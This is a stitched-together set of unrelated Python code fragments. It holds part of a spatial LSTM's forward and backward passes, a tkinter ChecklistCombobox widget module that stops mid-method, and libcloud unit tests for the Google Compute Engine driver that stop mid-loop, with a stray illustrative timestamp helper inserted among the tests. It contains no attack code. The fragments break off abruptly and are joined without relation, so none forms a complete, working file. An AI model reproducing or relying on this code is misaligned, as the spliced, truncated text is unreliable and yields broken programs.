start_col = j * self.stride_
cm.get_glimpses_matrix_scan(self.F_x_, self.F_y_, start_row, start_col, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_.GetW(), patches)
if input_mr is not None:
self.is_imput_mr_ = 1
patches_mr = self.patches_mr_.slice(start, end)
start_row_mr = start_row - self.input_patch_side_/2
start_col_mr = start_col - self.input_patch_side_/2
if start_row_mr < 0:
start_row_mr = 0
elif start_row_mr + self.input_patch_side_*2 > self.image_side_:
start_row_mr = self.image_side_ - self.input_patch_side_*2
if start_col_mr < 0:
start_col_mr = 0
elif start_col_mr + self.input_patch_side_*2 > self.image_side_:
start_col_mr = self.image_side_ - self.input_patch_side_*2
cm.get_glimpses_matrix_scan_mr3(self.F_x_, self.F_y_, start_row_mr, start_col_mr, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches_mr, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_mr_.GetW(), patches_mr)
else:
gates.add_dot(self.w_input_.GetW(), input_frame)
gates.add_col_vec(self.b_.GetW())
cm.lstm_fprop_spatial_init(gates, cell_state, hidden_state, self.w_diag_.GetW())
else:
cell_state.add(init_cell)
assert init_hidden is not None
hidden_state.add(init_hidden)
elif self.i_ == 0:
prev_row_start = start - batch_size
prev_row_hidden_state = self.hidden_.slice(prev_row_start, start)
prev_row_cell_state = self.cell_.slice(prev_row_start, start)
if input_frame is not None:
assert self.has_input_
if self.has_spatial_:
patches = self.patches_.slice(start, end)
start_row = i * self.stride_
start_col = j * self.stride_
cm.get_glimpses_matrix_scan(self.F_x_, self.F_y_, start_row, start_col, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_.GetW(), patches)
if input_mr is not None:
patches_mr = self.patches_mr_.slice(start, end)
start_row_mr = start_row - self.input_patch_side_/2
start_col_mr = start_col - self.input_patch_side_/2
if start_row_mr < 0:
start_row_mr = 0
elif start_row_mr + self.input_patch_side_*2 > self.image_side_:
start_row_mr = self.image_side_ - self.input_patch_side_*2
if start_col_mr < 0:
start_col_mr = 0
elif start_col_mr + self.input_patch_side_*2 > self.image_side_:
start_col_mr = self.image_side_ - self.input_patch_side_*2
cm.get_glimpses_matrix_scan_mr3(self.F_x_, self.F_y_, start_row_mr, start_col_mr, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches_mr, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_mr_.GetW(), patches_mr)
else:
gates.add_dot(self.w_input_.GetW(), input_frame)
gates.add_dot(self.w_dense_row_.GetW(), prev_row_hidden_state)
gates.add_col_vec(self.b_.GetW())
cm.lstm_fprop_spatial_row_init(gates, prev_row_cell_state, cell_state, hidden_state, self.w_diag_.GetW())
elif self.j_ == 0:
prev_col_start = (self.i_ - 1) * self.row_length_ * batch_size
prev_col_end = prev_col_start + batch_size
prev_col_hidden_state = self.hidden_.slice(prev_col_start, prev_col_end)
prev_col_cell_state = self.cell_.slice(prev_col_start, prev_col_end)
if input_frame is not None:
assert self.has_input_
if self.has_spatial_:
patches = self.patches_.slice(start, end)
start_row = i * self.stride_
start_col = j * self.stride_
cm.get_glimpses_matrix_scan(self.F_x_, self.F_y_, start_row, start_col, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_.GetW(), patches)
if input_mr is not None:
patches_mr = self.patches_mr_.slice(start, end)
start_row_mr = start_row - self.input_patch_side_/2
start_col_mr = start_col - self.input_patch_side_/2
if start_row_mr < 0:
start_row_mr = 0
elif start_row_mr + self.input_patch_side_*2 > self.image_side_:
start_row_mr = self.image_side_ - self.input_patch_side_*2
if start_col_mr < 0:
start_col_mr = 0
elif start_col_mr + self.input_patch_side_*2 > self.image_side_:
start_col_mr = self.image_side_ - self.input_patch_side_*2
cm.get_glimpses_matrix_scan_mr3(self.F_x_, self.F_y_, start_row_mr, start_col_mr, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches_mr, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_mr_.GetW(), patches_mr)
else:
gates.add_dot(self.w_input_.GetW(), input_frame)
gates.add_dot(self.w_dense_col_.GetW(), prev_col_hidden_state)
gates.add_col_vec(self.b_.GetW())
cm.lstm_fprop_spatial_col_init(gates, prev_col_cell_state, cell_state, hidden_state, self.w_diag_.GetW())
else:
prev_row_start = start - batch_size
prev_row_hidden_state = self.hidden_.slice(prev_row_start, start)
prev_row_cell_state = self.cell_.slice(prev_row_start, start)
prev_col_start = ((self.i_ - 1) * self.row_length_ + self.j_) * batch_size
prev_col_end = prev_col_start + batch_size
prev_col_hidden_state = self.hidden_.slice(prev_col_start, prev_col_end)
prev_col_cell_state = self.cell_.slice(prev_col_start, prev_col_end)
if input_frame is not None:
assert self.has_input_
if self.has_spatial_:
patches = self.patches_.slice(start, end)
start_row = i * self.stride_
start_col = j * self.stride_
cm.get_glimpses_matrix_scan(self.F_x_, self.F_y_, start_row, start_col, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_.GetW(), patches)
if input_mr is not None:
patches_mr = self.patches_mr_.slice(start, end)
start_row_mr = start_row - self.input_patch_side_/2
start_col_mr = start_col - self.input_patch_side_/2
if start_row_mr < 0:
start_row_mr = 0
elif start_row_mr + self.input_patch_side_*2 > self.image_side_:
start_row_mr = self.image_side_ - self.input_patch_side_*2
if start_col_mr < 0:
start_col_mr = 0
elif start_col_mr + self.input_patch_side_*2 > self.image_side_:
start_col_mr = self.image_side_ - self.input_patch_side_*2
cm.get_glimpses_matrix_scan_mr3(self.F_x_, self.F_y_, start_row_mr, start_col_mr, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches_mr, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_mr_.GetW(), patches_mr)
else:
gates.add_dot(self.w_input_.GetW(), input_frame)
gates.add_dot(self.w_dense_row_.GetW(), prev_row_hidden_state)
gates.add_dot(self.w_dense_col_.GetW(), prev_col_hidden_state)
gates.add_col_vec(self.b_.GetW())
cm.lstm_fprop_spatial(gates, prev_row_cell_state, prev_col_cell_state, cell_state, hidden_state, self.w_diag_.GetW())
if self.has_output_:
assert output_frame is not None
if self.has_spatial_dec_:
F_x_hat = self.F_x_hat_.slice(start, end)
F_y_hat = self.F_y_hat_.slice(start, end)
# reconstruct reversely
i = self.col_length_ - 1 - self.i_
j = self.row_length_ - 1 - self.j_
start_row = i * self.stride_
start_col = j * self.stride_
self.output_patch_.assign(0)
self.output_patch_.add_dot(self.w_output_.GetW(), hidden_state)
self.output_patch_.add_col_vec(self.b_output_.GetW())
cm.get_glimpses_matrix_scan(F_x_hat, F_y_hat, start_row, start_col, self.output_patch_side_, self.image_side_)
cm.apply_glmatrix_hat(self.canvas_left_, F_y_hat, self.para_atten_hat_, self.output_patch_, self.output_patch_side_, self.image_side_)
cm.apply_glmatrix_hat(self.canvas_, F_x_hat, self.para_atten_hat_, self.canvas_left_, self.output_patch_side_, self.image_side_)
output_frame.add(self.canvas_)
else:
output_frame.add_dot(self.w_output_.GetW(), hidden_state)
output_frame.add_col_vec(self.b_output_.GetW())
self.j_ += 1
if self.j_ == self.row_length_ and self.i_ < self.col_length_-1:
self.j_ = 0
self.i_ += 1
def BpropAndOutp(self, input_frame=None, input_deriv=None,
init_cell=None, init_hidden=None,
init_cell_deriv=None, init_hidden_deriv=None,
prev_model_hidden=None, prev_model_hidden_deriv=None,
input_mr=None, output_deriv=None):
batch_size = self.batch_size_
if self.j_ == 0 and self.i_ > 0:
self.j_ = self.row_length_
self.i_ -= 1
self.j_ -= 1
t = self.i_ * self.row_length_ + self.j_
assert self.i_ >= 0
assert self.j_ >= 0
assert self.i_ < self.col_length_
assert self.j_ < self.row_length_
num_lstms = self.num_lstms_
start = t * batch_size
end = start + batch_size
gates = self.gates_.slice(start, end)
gates_deriv = self.gates_deriv_.slice(start, end)
cell_state = self.cell_.slice(start, end)
cell_deriv = self.cell_deriv_.slice(start, end)
<filename>checklistcombobox.py
import tkinter as tk # Python 3 only
import tkinter.ttk as ttk
import tkinter.font as tkfont
import numpy as np
# GUI features to test (X means completed):
# 1.) Both 'normal' and 'readonly'
# X Pressing Tab at any time (popdown or no) moves to the next widget
# X Pressing Tab with an item highlighted selects that item and then moves to the next widget
# X Pressing up/down arrows when the popdown menu is down moves the selection up/down
# X Pressing up/down on top/bottom selections scrolls the view down by 1 line
# X Pressing Escape with the popdown visible hides the popdown
# X Scrollwheel when popdown is down scrolls by 4 units (Listbox source code)
# X Clicking the trough of the scrollwheel moves the view by 1 "page"
# X When the popdown window appears, the view is set automatically to where the current
# selection is. If the current selection is not in view, the view is set such that
# the selection is centered (using integer math). If the selection is in view, no
# scrolling is done and the selection is not centered. If the selection is only 1 item
# away from being in view, the view is set such that the item is in view, but is either
# at the very top or very bottom depending on which side it was closest to.
# X PageUp/PageDown keys do the same thing as the scrollwheel trough
# X A scrollbar is placed in the dropdown menu when the number of values in the list
# exceeds the height of the list (= height of the combobox)
# X There is 1 pixel of whitespace between the listbox items and the popdown frame
# X There are 2 pixels of whitespace between the scrollbar and the listbox items
# X The Enter key does the same thing as clicking on the currently highlighted item
# X Control+Home and Control+End go to the top and bottom of the listbox respectively
# X Click+Drag should work the same as regular Drag, but when the button is released, the
# highlighted item is selected. This is true while INSIDE the popdown menu. When OUTSIDE,
# the canvas should be scrolled "automatically" up or down
# 2.) state = 'normal'
# X When a selection is made, the text in the Entry widget is highlighted
# X Can click inside the Entry widget without creating the popdown
# X Can type anything into the Entry widget
# X Text does not change in Entry widget until a selection is made
# X Tabbing in to the widget highlights the text in the Entry widget
# 3.) state = 'disabled'
# X Clicking the widget does nothing
# X Cannot tab into the widget
# X Colors change to a 'disabled' theme
# 4.) state = 'readonly'
# X Clicking the Entry widget makes the popdown appear
# X Entire Entry widget space is highlighted after making a selection
# X Typing does nothing
# X Tabbing into the widget highlights the entire Entry widget
class ChecklistCombobox(ttk.Combobox):
"""
ChecklistCombobox v1.1
Author: <NAME>
November 2020
This widget is a regular ttk.Combobox, but instead of a Listbox in the popdown
window, there is a list of checkboxes. It is designed to function almost
identically to a ttk.Combobox, except for some fringe cases. Learning from
mistakes made in tkinter, this widget is fully customizable to the extent that
tkinter allows.
The standard Listbox widget from ttk.Combobox is unfortunately inseparable from
the popdown menu because a majority of the tcl code for ttk.Combobox would need
to be replaced. This would mangle any other regular ttk.Combobox widgets
attached to the Tk() instance. Instead, we simply put stuff on top of the
Listbox.
Here is a tree of widgets that are accessible to the user. Tree depth indicates
widget stacking. For example, ChecklistCombobox.popdown is a subwidget (child)
of ChecklistCombobox.
Tree Widget type
ChecklistCombobox ttk.Combobox
ChecklistCombobox.popdown tk.Toplevel
ChecklistCombobox.popdown_frame special popdown frame widget
ChecklistCombobox.listbox tk.Listbox
ChecklistCombobox.scrollbar ttk.Scrollbar
ChecklistCombobox.canvas tk.Canvas
ChecklistCombobox.checkbutton_frame tk.Frame
ChecklistCombobox.checkbuttons list with length = len(values)
tk.Checkbutton
Any of these widgets can be accessed by the user by simply calling them. For
example, to change the height of all the checkbuttons, you can do,
```
cb = ChecklistCombobox(root,values=('1','2','3','4'))
for button in cb.checkbuttons:
button.configure(height=2)
```
Equivalently, you can do,
```
cb = ChecklistCombobox(root,values=('1','2','3','4'))
cb.configure(checkbutton_height=2)
```
This is because this class handles the configure method in a special way. The
keywords are parsed and then passed to the appropriate widgets based on the
prefix they are given. Supported prefixes are,
```
popdown_
popdown_frame_
scrollbar_
canvas_
checkbutton_frame_
checkbutton_
checkbutton_selected_
```
Prefix `checkbutton_selected_` can be used to specify the Checkbutton attributes
when they are highlighted, but only the `background`, `foreground`,
`selectcolor`, `activeforeground`, and `activebackground`.
Be careful when using `popdown_frame_` and `scrollbar_` because they are special
widgets exclusive to the Combobox Popdown menu. You can list their options by
doing `print(cb.popdown_frame.configure())`. All other prefixes work in the way
you would expect. Given some option X from the tkinter widget documentation, you
can change the option using,
```
ChecklistCombobox.configure(prefix_X)
```
You can even configure the checkbuttons separately by giving an array-like
(`list`, `tuple`, or `numpy.ndarray`) argument where the elements have the same
order as the `values` keyword.
So as to avoid confusion, the original ttk.Combobox tcl source code which this
code was based on has been included at the bottom of this code.
Also near the bottom of this code is a short test program you can use simply by
running `python checklistcombobox.py`.
"""
def __init__(self,master=None,**kw):
self.values = kw.pop('values',None)
if self.values is None: self.values = []
if not isinstance(self.values,(list,tuple,np.ndarray)): self.values = list(self.values)
### Create the widgets
# Create the Combobox
ttk.Combobox.__init__(self,master,values=self.values)
self.tk.eval('ttk::combobox::ConfigureListbox %s' % (self)) # This updates the listbox in the popdown
# Break the Combobox down into its constituent parts
self.popdown = tk.Toplevel()
self.popdown.withdraw()
self.popdown._w = '%s.popdown' % (self)
self.popdown_frame = tk.Frame()
self.popdown_frame._w = '%s.popdown.f' % (self)
self.listbox = tk.Listbox()
self.listbox._w = '%s.popdown.f.l' % (self)
self.scrollbar = tk.Scrollbar()
self.scrollbar_repeatdelay = self.scrollbar.cget('repeatdelay')
self.scrollbar_repeatinterval = self.scrollbar.cget('repeatinterval')
self.scrollbar._w = '%s.popdown.f.sb' % (self)
# Create the checkbuttons
self.canvas_frame = tk.Frame(self.popdown_frame) # Frame in front of canvas for borders
self.canvas = tk.Canvas(self.canvas_frame) # Canvas for scrolling
self.checkbutton_frame = tk.Frame(self.canvas) # Checkbutton container
self.checkbuttons = []
self.variables = []
self.selection = None
if len(self.values) > 0: self.create_checkbuttons()
### Grid the widgets
self.checkbutton_frame.grid_propagate(0)
self.checkbutton_frame.columnconfigure(0,weight=1)
self.canvas_frame.grid_propagate(0)
self.canvas_frame.columnconfigure(0,weight=1)
#for i,button in enumerate(self.checkbuttons):
# button.grid(row=i,column=0,sticky='news')
self.canvas.grid(row=0,column=0,sticky='news')
self.checkbutton_frame.grid(row=0,column=0,sticky='news')
self.canvas.create_window((0,0),window=self.checkbutton_frame,anchor='nw')
self.canvas_frame.grid(row=0,column=0,padx=1,pady=1,sticky='news')
### Initialize
self.listbox.configure(yscrollcommand='') # Break connection between listbox and scrollbar
self.configure(**kw) # Do initial configuration
# Make sure the popdown is ready to go the first time
self.last_clicked_button = None
self.autoscrolling = False
self.mouse_has_entered_popdown = False
self.afterId = None
self.b1_motion_entered_popdown = False
self.configure_popdown() # Initial configuration
self.topbutton = 0
if len(self.cget('values')) > self.cget('height'):
self.bottombutton = self.cget('height')-1
else:
self.bottombutton = len(self.checkbuttons)-1
self.previous_button_kw = {}
if self.checkbuttons:
self.selection = 0
for key in self.checkbuttons[self.selection].keys():
self.previous_button_kw[key] = self.checkbuttons[self.selection].cget(key)
# Select the button
self.checkbuttons[self.selection].configure(bg=self.checkbutton_selected_background[self.selection],
fg=self.checkbutton_selected_foreground[self.selection],
selectcolor=self.checkbutton_selected_selectcolor[self.selection],
activebackground=self.checkbutton_selected_activebackground[self.selection],
activeforeground=self.checkbutton_selected_activeforeground[self.selection])
### Create keybindings
self.listbox.bind("<Down>",self.on_down) # Down arrow
self.listbox.bind("<Up>",self.on_up) # Up arrow
self.listbox.bind("<Prior>",lambda event: self.scroll(event,amount=-1,units='pages')) # PageUp
self.listbox.bind("<Next>",lambda event: self.scroll(event,amount=1,units='pages')) # PageDown
self.listbox.bind("<Control-Home>",lambda event: self.select(self.checkbuttons[0]))
self.listbox.bind("<Control-End>",lambda event: self.select(self.checkbuttons[-1]))
self.listbox.bind("<KeyPress-Return>",self.on_carraige_return) # Enter
self.listbox.bind("<Motion>",self.do_nothing) # Mouse motions
self.listbox.bind("<KeyPress-Tab>",self.on_lb_tab) # Tab
self.listbox.bind("<<PrevWindow>>",self.on_lb_prevwindow) # Relates to the Tab key
self.listbox.bind("<MouseWheel>",self.do_nothing)
#self.listbox.bind("<Map>",self.do_nothing) # This almost works
self.bind("<MouseWheel>",self.do_nothing) # MouseWheel on Entry widget in this case is nonsensical
if self.tk.eval('if {[tk windowingsystem] eq "x11"} {expr {1}} else {expr {0}}'):
self.bind("<ButtonPress-4>",self.do_nothing)
self.bind("<ButtonPress-5>",self.do_nothing)
self.popdown.bind("<MouseWheel>",self.on_popdown_mousewheel)
self.bind("<ButtonPress-1>",lambda event: self.popdown.focus_set()) # Don't let the focus get set on the entry widget before mapping, to avoid "flickering"
#self.listbox.bind("<Map>",self.configure_popdown) # When the listbox is mapped, reconfigure the popdown
self.popdown_frame.bind("<Configure>",self.configure_popdown)
#self.popdown_frame.bind("<Map>",self.scroll_to_last_clicked_button)
self.popdown.bind("<Unmap>",self.popdown_unmap)
self.bind("<FocusOut>",self.popdown_unmap)
self.popdown.bind("<Motion>",self.on_motion)
self.popdown.bind("<B1-Motion>",self.on_b1_motion)
#self.scrollbar.bind("<ButtonPress-1>",self.on_scrollbar_click_press)
#self.scrollbar.bind("<ButtonRelease-1>",self.on_scrollbar_click_release)
def __getattribute__(self,attr):
# Custom configure function
if attr == 'configure' or attr == 'config':
return self.custom_configure
return super(ChecklistCombobox,self).__getattribute__(attr)
def custom_configure(self,cnf=None,**kw):
self.checkbutton_selected_background = kw.get('checkbutton_selected_background',[self.listbox.cget('selectbackground')]*len(self.checkbuttons))
self.checkbutton_selected_foreground = kw.get('checkbutton_selected_foreground',[self.listbox.cget('selectforeground')]*len(self.checkbuttons))
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for Google Compute Engine Driver
"""
import datetime
import mock
import sys
import unittest
from libcloud.utils.py3 import httplib
from libcloud.compute.drivers.gce import (
GCENodeDriver, API_VERSION, timestamp_to_datetime, GCEAddress, GCEBackend,
GCEBackendService, GCEFirewall, GCEForwardingRule, GCEHealthCheck,
GCENetwork, GCENodeImage, GCERoute, GCERegion, GCETargetHttpProxy,
GCEUrlMap, GCEZone, GCESubnetwork, GCEProject)
from libcloud.common.google import (GoogleBaseAuthConnection,
ResourceNotFoundError, ResourceExistsError,
GoogleBaseError)
from libcloud.test.common.test_google import GoogleAuthMockHttp, GoogleTestCase
from libcloud.compute.base import Node, StorageVolume
from libcloud.compute.types import NodeState
from libcloud.test import MockHttp
from libcloud.test.compute import TestCaseMixin
from libcloud.test.file_fixtures import ComputeFileFixtures
from libcloud.test.secrets import GCE_PARAMS, GCE_KEYWORD_PARAMS
class GCENodeDriverTest(GoogleTestCase, TestCaseMixin):
"""
Google Compute Engine Test Class.
"""
# Mock out a few specific calls that interact with the user, system or
# environment.
GCEZone._now = lambda x: datetime.datetime(2013, 6, 26, 19, 0, 0)
datacenter = 'us-central1-a'
def setUp(self):
GCEMockHttp.test = self
GCENodeDriver.connectionCls.conn_class = GCEMockHttp
GoogleBaseAuthConnection.conn_class = GoogleAuthMockHttp
GCEMockHttp.type = None
kwargs = GCE_KEYWORD_PARAMS.copy()
kwargs['auth_type'] = 'IA'
kwargs['datacenter'] = self.datacenter
self.driver = GCENodeDriver(*GCE_PARAMS, **kwargs)
def test_default_scopes(self):
self.assertIsNone(self.driver.scopes)
def test_build_service_account_gce_struct_default_service_account(self):
result = self.driver._build_service_accounts_gce_list(service_accounts=None)
self.assertEqual(result, [
{'email': 'default',
'scopes': ['https://www.googleapis.com/auth/devstorage.read_only']
}
])
def test_build_service_account_gce_struct_no_service_account(self):
result = self.driver._build_service_accounts_gce_list(service_accounts=[])
self.assertEqual(result, [])
def test_build_service_account_gce_struct_custom_service_account(self):
data = [
{'email': '1', 'scopes': ['a']},
{'email': '2', 'scopes': ['b']}
]
expected_result = [
{'email': '1', 'scopes': ['https://www.googleapis.com/auth/a']},
{'email': '2', 'scopes': ['https://www.googleapis.com/auth/b']}
]
result = self.driver._build_service_accounts_gce_list(service_accounts=data)
self.assertEqual(result, expected_result)
def test_timestamp_to_datetime(self):
timestamp1 = '2013-06-26T10:05:19.340-07:00'
datetime1 = datetime.datetime(2013, 6, 26, 17, 5, 19)
self.assertEqual(timestamp_to_datetime(timestamp1), datetime1)
timestamp2 = '2013-06-26T17:43:15.000-00:00'
datetime2 = datetime.datetime(2013, 6, 26, 17, 43, 15)
self.assertEqual(timestamp_to_datetime(timestamp2), datetime2)
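# Illustrative only (not libcloud's implementation): converting an RFC 3339
# timestamp with a UTC offset, like the fixtures above, into a naive UTC datetime
# using only the standard library. Assumes Python 3.7+ for datetime.fromisoformat.
from datetime import datetime as _dt, timezone as _tz
def _to_naive_utc(ts):
    # fromisoformat handles the offsets used above ('-07:00', '-00:00');
    # the result is shifted to UTC and the tzinfo dropped.
    return _dt.fromisoformat(ts).astimezone(_tz.utc).replace(tzinfo=None)
# _to_naive_utc('2013-06-26T10:05:19.340-07:00') == datetime(2013, 6, 26, 17, 5, 19, 340000)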
def test_get_object_by_kind(self):
obj = self.driver._get_object_by_kind(None)
self.assertIsNone(obj)
obj = self.driver._get_object_by_kind('')
self.assertIsNone(obj)
obj = self.driver._get_object_by_kind(
'https://www.googleapis.com/compute/v1/projects/project_name/'
'global/targetHttpProxies/web-proxy')
self.assertEqual(obj.name, 'web-proxy')
def test_get_region_from_zone(self):
zone1 = self.driver.ex_get_zone('us-central1-a')
expected_region1 = 'us-central1'
region1 = self.driver._get_region_from_zone(zone1)
self.assertEqual(region1.name, expected_region1)
zone2 = self.driver.ex_get_zone('europe-west1-b')
expected_region2 = 'europe-west1'
region2 = self.driver._get_region_from_zone(zone2)
self.assertEqual(region2.name, expected_region2)
def test_get_volume(self):
volume_name = 'lcdisk'
volume = self.driver.ex_get_volume(volume_name)
self.assertTrue(isinstance(volume, StorageVolume))
self.assertEqual(volume.name, volume_name)
def test_get_volume_location(self):
volume_name = 'lcdisk'
location = self.driver.zone
volume = self.driver.ex_get_volume(volume_name, zone=location)
self.assertTrue(isinstance(volume, StorageVolume))
self.assertEqual(volume.name, volume_name)
def test_get_volume_location_name(self):
volume_name = 'lcdisk'
location = self.driver.zone
volume = self.driver.ex_get_volume(volume_name, zone=location.name)
self.assertTrue(isinstance(volume, StorageVolume))
self.assertEqual(volume.name, volume_name)
def test_find_zone_or_region(self):
zone1 = self.driver._find_zone_or_region('libcloud-demo-np-node',
'instances')
self.assertEqual(zone1.name, 'us-central2-a')
zone2 = self.driver._find_zone_or_region(
'libcloud-demo-europe-np-node', 'instances')
self.assertEqual(zone2.name, 'europe-west1-a')
region = self.driver._find_zone_or_region('libcloud-demo-address',
'addresses', region=True)
self.assertEqual(region.name, 'us-central1')
def test_match_images(self):
project = 'debian-cloud'
image = self.driver._match_images(project, 'debian-7')
self.assertEqual(image.name, 'debian-7-wheezy-v20131120')
image = self.driver._match_images(project, 'backports')
self.assertEqual(image.name, 'backports-debian-7-wheezy-v20131127')
def test_build_disk_gce_struct(self):
device_name = 'disk_name'
disk_name = None
source = self.driver.ex_get_volume('lcdisk')
is_boot = True
# source as input
d = self.driver._build_disk_gce_struct(
device_name=device_name, source=source, disk_name=disk_name,
is_boot=is_boot)
self.assertEqual(source.extra['selfLink'], d['source'])
self.assertTrue(d['boot'])
self.assertTrue(d['autoDelete'])
self.assertEqual('READ_WRITE', d['mode'])
self.assertFalse('initializeParams' in d)
# image as input
device_name = 'disk_name'
disk_type = self.driver.ex_get_disktype('pd-ssd', 'us-central1-a')
image = self.driver.ex_get_image('debian-7')
source = None
is_boot = True
d = self.driver._build_disk_gce_struct(device_name=device_name,
disk_type=disk_type,
image=image, is_boot=is_boot)
self.assertEqual('READ_WRITE', d['mode'])
self.assertEqual('PERSISTENT', d['type'])
self.assertTrue('initializeParams' in d and
isinstance(d['initializeParams'], dict))
self.assertTrue(
all(k in d['initializeParams']
for k in ['sourceImage', 'diskType', 'diskName']))
self.assertTrue(d['initializeParams']['sourceImage'].startswith(
'https://'))
self.assertTrue(d['autoDelete'])
self.assertTrue(d['boot'])
def test_build_network_gce_struct(self):
network = self.driver.ex_get_network('lcnetwork')
address = self.driver.ex_get_address('lcaddress')
internalip = self.driver.ex_get_address('testaddress')
subnetwork_name = 'cf-972cf02e6ad49112'
subnetwork = self.driver.ex_get_subnetwork(subnetwork_name)
d = self.driver._build_network_gce_struct(network, subnetwork, address)
self.assertTrue('network' in d)
self.assertTrue('subnetwork' in d)
self.assertTrue('kind' in d and
d['kind'] == 'compute#instanceNetworkInterface')
self.assertEqual(d['accessConfigs'][0]['natIP'], address.address)
# test with internal IP
d = self.driver._build_network_gce_struct(network, subnetwork, address,
internal_ip=internalip)
self.assertTrue('network' in d)
self.assertTrue('subnetwork' in d)
self.assertTrue('kind' in d and
d['kind'] == 'compute#instanceNetworkInterface')
self.assertEqual(d['accessConfigs'][0]['natIP'], address.address)
self.assertEqual(d['networkIP'], internalip)
network = self.driver.ex_get_network('default')
d = self.driver._build_network_gce_struct(network)
self.assertTrue('network' in d)
self.assertFalse('subnetwork' in d)
self.assertTrue('kind' in d and
d['kind'] == 'compute#instanceNetworkInterface')
def test_build_scheduling_gce_struct(self):
self.assertFalse(
self.driver._build_scheduling_gce_struct(None, None, None))
# on_host_maintenance bad value should raise a ValueError
self.assertRaises(ValueError,
self.driver._build_service_account_gce_struct,
'on_host_maintenance="foobar"')
# on_host_maintenance is 'MIGRATE' and preempt is True
self.assertRaises(ValueError,
self.driver._build_service_account_gce_struct,
'on_host_maintenance="MIGRATE"', 'preemptible=True')
# automatic_restart is True and preempt is True
self.assertRaises(ValueError,
self.driver._build_service_account_gce_struct,
'automatic_restart="True"', 'preemptible=True')
actual = self.driver._build_scheduling_gce_struct('TERMINATE', True,
False)
self.assertTrue('automaticRestart' in actual and
actual['automaticRestart'] is True)
self.assertTrue('onHostMaintenance' in actual and
actual['onHostMaintenance'] == 'TERMINATE')
self.assertTrue('preemptible' in actual)
self.assertFalse(actual['preemptible'])
def test_build_service_account_gce_struct(self):
self.assertRaises(ValueError,
self.driver._build_service_account_gce_struct, None)
input = {'scopes': ['compute-ro']}
actual = self.driver._build_service_account_gce_struct(input)
self.assertTrue('email' in actual)
self.assertTrue('scopes' in actual)
input = {'scopes': ['compute-ro'], 'email': '<EMAIL>'}
actual = self.driver._build_service_account_gce_struct(input)
self.assertTrue('email' in actual)
self.assertEqual(actual['email'], '<EMAIL>')
self.assertTrue('scopes' in actual)
def test_build_service_account_gce_list(self):
# ensure we have a list
self.assertRaises(ValueError,
self.driver._build_service_accounts_gce_list, 'foo')
# no input
actual = self.driver._build_service_accounts_gce_list()
self.assertTrue(len(actual) == 1)
self.assertTrue('email' in actual[0])
self.assertTrue('scopes' in actual[0])
def test_get_selflink_or_name(self):
network = self.driver.ex_get_network('lcnetwork')
# object as input
actual = self.driver._get_selflink_or_name(network, False, 'network')
self.assertEqual('lcnetwork', actual)
actual = self.driver._get_selflink_or_name(network, True, 'network')
self.assertTrue(actual.startswith('https://'))
# name-only as input
actual = self.driver._get_selflink_or_name('lcnetwork', True,
'network')
self.assertTrue(actual.startswith('https://'))
actual = self.driver._get_selflink_or_name('lcnetwork', False,
'network')
self.assertEqual('lcnetwork', actual)
# if selflinks is true, we need objname
self.assertRaises(ValueError, self.driver._get_selflink_or_name,
'lcnetwork', True)
def test_ex_get_serial_output(self):
self.assertRaises(ValueError, self.driver.ex_get_serial_output, 'foo')
node = self.driver.ex_get_node('node-name', 'us-central1-a')
self.assertEqual(
self.driver.ex_get_serial_output(node),
'This is some serial\r\noutput for you.')
def test_ex_list(self):
d = self.driver
# Test the default case for all list methods
# (except list_volume_snapshots, which requires an arg)
for list_fn in (d.ex_list_addresses, d.ex_list_backendservices,
d.ex_list_disktypes, d.ex_list_firewalls,
d.ex_list_forwarding_rules, d.ex_list_healthchecks,
d.ex_list_networks, d.ex_list_subnetworks,
d.ex_list_project_images, d.ex_list_regions,
d.ex_list_routes, d.ex_list_snapshots,
d.ex_list_targethttpproxies, d.ex_list_targetinstances,
d.ex_list_targetpools, d.ex_list_urlmaps,
d.ex_list_zones, d.list_images, d.list_locations,
d.list_nodes, d.list_sizes, d.list_volumes):
